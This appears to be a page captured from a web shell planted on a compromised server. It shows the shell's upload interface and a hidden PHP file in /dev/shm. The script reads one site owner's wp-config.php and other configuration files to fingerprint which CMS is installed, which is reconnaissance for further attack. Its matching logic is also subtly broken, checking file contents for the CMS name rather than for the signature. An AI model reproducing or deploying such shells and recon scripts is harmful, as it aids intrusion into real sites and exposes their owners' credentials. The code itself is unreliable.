AlkantarClanX12

Your IP : 216.73.216.14


Current Path : /dev/shm/
Upload File :
Current File : //dev/shm/.rec

<?php   $r = '/home/hudasuls/hillarymugasia.online'; $a = ['wp-config.php' => ['DB_PASSWORD' => 'wp'], 'index.php' => ['@package    Joomla.Site' => 'joomla', 'DRUPAL_ROOT' => 'drupal', 'use Magento\Framework\App\Bootstrap' => 'magento'], 'configuration.php' => ['JConfig' => 'joomla'], 'cron.php' => ['DRUPAL_ROOT' => 'drupal', 'Magento\Store\Model' => 'magento'], 'init.php' => ['Copyright since 2007 PrestaShop' => 'prestashop'], 'config.php' => ["define('DIR_APPLICATION'" => 'opencart']];  foreach ($a as $path => $patterns) {     $t = "{$r}/{$path}";     if (file_exists($t)) {         $c = file_get_contents($t);         foreach ($patterns as $p => $cms) {             if(strstr($c, $cms)) {                 die("<c>{$cms}</c>");             }         }     } } die('<c>unknown</c>');